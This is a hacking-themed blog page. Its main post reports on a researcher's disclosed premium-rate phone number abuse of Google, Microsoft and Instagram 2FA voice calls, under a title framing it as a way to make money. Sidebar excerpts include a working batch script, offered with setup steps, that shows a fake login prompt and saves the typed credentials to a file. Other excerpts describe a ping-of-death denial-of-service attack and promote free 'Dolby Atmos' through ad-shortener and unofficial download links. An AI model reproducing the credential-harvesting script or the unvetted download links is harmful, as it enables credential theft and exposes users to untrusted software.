Skip to main content

How to make money from google and microsoft


Smart hackers could exploit a loophole that could allow them to steal a significant amount of cash from Google, Microsoft and Instagram using a Premium rate phone number.

Security researcher Arne Swinnen from Belgium has discovered an ingenious way to steal money from big tech companies like Google, Microsoft, and Instagram using their two-factor authentication (2FA) voice-based token distribution systems.

Swinnen argues that any attacker with malicious intent could create fake Google, Microsoft or Instagram accounts, as well as premium phone services, and then link them together.

The attacker could then request 2FA voice-based tokens for all fake accounts using an automated scripts, placing legitimate phone calls to his service to earn him quite a nice profit.

Swinnen created accounts on Google, Microsoft Office 365 and Instagram and then tied them to a premium phone number instead of a regular one.

As a result, whenever one of these three services would call the account's phone number to send the user their account access code, the premium number would register an incoming call and bill the companies.

"They all offer services to supply users with a token via a computer-voiced phone call, but neglected to properly verify whether supplied phone numbers were legitimate non-premium numbers," Swinnen says in his blog.

"This allowed a dedicated attacker to steal thousands of EUR/USD/GBP/... Microsoft was exceptionally vulnerable to mass exploitation by supporting virtually unlimited concurrent calls to one premium number."


Although the Swinnen reported the loophole to all the three companies, he calculated that he could have stolen €432,000 per year from Google, €669,000 per year from Microsoft and €2,066,000 per year from Instagram.

You can learn more technical details about the hack in Swinnen's blog post.

Although no customer data was being put at risk through his hack, Facebook (who owns Instagram) and Microsoft rewarded Swinnen with $2000 and $500 via their bug bounty programs, while Google mentioned his name in the company's Hall of Fame.

Comments

Post a Comment

Popular posts from this blog

Create a key logger using cmd

Here is a basic  keylogger  script for beginners to understand the basics of how keylogging works in notepad. This script should be used for research purposes only. @echo off color a title Login cls echo Please Enter Email Adress And Password echo. echo. cd "C:Logs" set /p user=Username: set /p pass=Password: echo Username="%user%" Password="%pass%" >> Log.txt start >>Program Here<< exit Step 1:  Now paste the above code into Notepad and save it as a  Logger.bat  file. Step 2:  Make a new folder on the desktop and name it Logs ( If the folder is not called Logs, then it will not work.) Step 3:  Drag that folder in to the  C: Step 4:  Test out the  Logger.bat ! Related  All-in-one Messenger - FacebookMessenger, WhatsApp, Skype and many more in one window Step 5:  Alright, now once you test it, you will go back into the Logs folder in the  C: and a  .txt  file will be in there, [if you make a second entry, the
Post a Comment
Read more

Perform cmd death attack

 A ping packet can also be malformed to perform denial of service attack by sending continuous ping packets to the target IP address. A continuous ping will cause buffer overflow at the target system and will cause the target system to crash.  We often use the CMD command “Ping” to mostly check if a server or a gateway is up and running. But, ping command can also be used for some other purposes. If we look at the basic level, then a ping packet is generally of size 56 bytes or 84 bytes (including IP header as well). However, a ping packet can also be made as large as up to 65536 bytes. Well, that’s the negative side of the ping packet. When we increase the size of the ping packet unnaturally, forming a malformed ping packet to attack a computer system, this type of attack is called “Ping of death” attack. How Ping of Death attack works? Not all computers can handle data larger than a fixed size. So, when a ping of death packet is sent from a source computer to a target machine, t
Post a Comment
Read more

get dolby atmos free on your PC

Welcome to my blog today i am here with very important item for your DDOOLLBBYY Atmos Everyone  or (at least geeks) knows  about the power of Dolby atmos we used to know that dolby atmos was only available for select PC only well not anymore from this link you can get in any pc note:  after installing dolby atmos install dolby access from https://dw27.malavida.com/dwn/8bdf73315506600b39e53dedb7616c896cc3811b629894bbe0bc994820b8af75/DolbyAccess.appx    and son't update from window store ..    just don't update it links http://gestyy.com/w2mDPI for dolby atmos   http://gestyy.com/w2mDKi  for device  driver ' http://gestyy.com/w2mDCF   for dolby atmos for gaming http://gestyy.com/w2mDN7    for dolby gaming driver if you  have any question feel free to comment
2 comments
Read more